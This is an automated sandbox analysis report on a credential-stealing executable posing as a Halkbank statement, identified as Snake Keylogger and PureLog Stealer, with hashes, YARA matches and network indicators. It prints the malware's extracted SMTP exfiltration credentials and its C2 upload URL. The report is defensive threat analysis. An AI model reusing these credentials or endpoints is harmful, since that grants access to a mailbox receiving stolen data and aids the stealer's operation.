Windows Analysis Report
Halkbank_Ekstre_20230426_075819_154055.exe

Overview

General Information

Sample name: Halkbank_Ekstre_20230426_075819_154055.exe
Analysis ID: 1435266
MD5: 42199f4a8e3d9fe6ce26a7d4922afec7
SHA1: 4e7547a14798f7c4520fab21ea2e34989bf27bc7
SHA256: 9745e0d21f50b1c553b40e8c353b11bb172a2bae1a83b3b9cfce26f9e01b3b89
Tags: exe

Detection

PureLog Stealer, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}
Source | Rule | Description | Author | Strings
00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x14880:$a1: get_encryptedPassword
  • 0x14b76:$a2: get_encryptedUsername
  • 0x1468c:$a3: get_timePasswordChanged
  • 0x14787:$a4: get_passwordField
  • 0x14896:$a5: set_encryptedPassword
  • 0x15e63:$a7: get_logins
  • 0x15dc6:$a10: KeyLoggerEventArgs
  • 0x15a5f:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x18184:$x1: $%SMTPDV$
  • 0x181e8:$x2: $#TheHashHere%&
  • 0x1983b:$x3: %FTPDV$
  • 0x1992f:$x4: $%TelegramDv$
  • 0x15a5f:$x5: KeyLoggerEventArgs
  • 0x15dc6:$x5: KeyLoggerEventArgs
  • 0x1985f:$m2: Clipboard Logs ID
  • 0x19a2b:$m2: Screenshot Logs ID
  • 0x19af7:$m2: keystroke Logs ID
  • 0x19a03:$m4: \SnakeKeylogger\

Source | Rule | Description | Author | Strings
0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Halkbank_Ekstre_20230426_075819_154055.exe | Avira: detected
Source: https://scratchdreams.tk | Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS | Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@eraslangroup.net", "Password": "aHZAyjDK", "Host": "mail.eraslangroup.net", "Port": "587"}
Source: scratchdreams.tk | Virustotal: Detection: 17%
Source: http://scratchdreams.tk | Virustotal: Detection: 17%
Source: https://scratchdreams.tk | Virustotal: Detection: 18%
Source: https://scratchdreams.tk/_send_.php?TS | Virustotal: Detection: 16%
Source: Halkbank_Ekstre_20230426_075819_154055.exe | Virustotal: Detection: 55%
Source: Halkbank_Ekstre_20230426_075819_154055.exe | ReversingLabs: Detection: 44%
Source: Halkbank_Ekstre_20230426_075819_154055.exe | Joe Sandbox ML: detected
Source: Halkbank_Ekstre_20230426_075819_154055.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: Halkbank_Ekstre_20230426_075819_154055.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: krUK.pdbSHA256COI source: Halkbank_Ekstre_20230426_075819_154055.exe
Source: Binary string: krUK.pdb source: Halkbank_Ekstre_20230426_075819_154055.exe

Networking

Source: Yara match | File source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/191.96.150.225 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 172.67.177.134
Source: Joe Sandbox View | IP Address: 104.21.27.85
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49708 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: scratchdreams.tk
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeString found in binary or memory: http://tempuri.org/DataSeta.xsd)Microsoft
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.225$
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
                  Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49726 version: TLS 1.2

                  System Summary

                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1980117407.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1978545566.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.2001619425.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000000.1967619527.0000000000394000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekrUK.exe: vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.2002294197.0000000007300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3220219789.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeBinary or memory string: OriginalFilenamekrUK.exe: vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
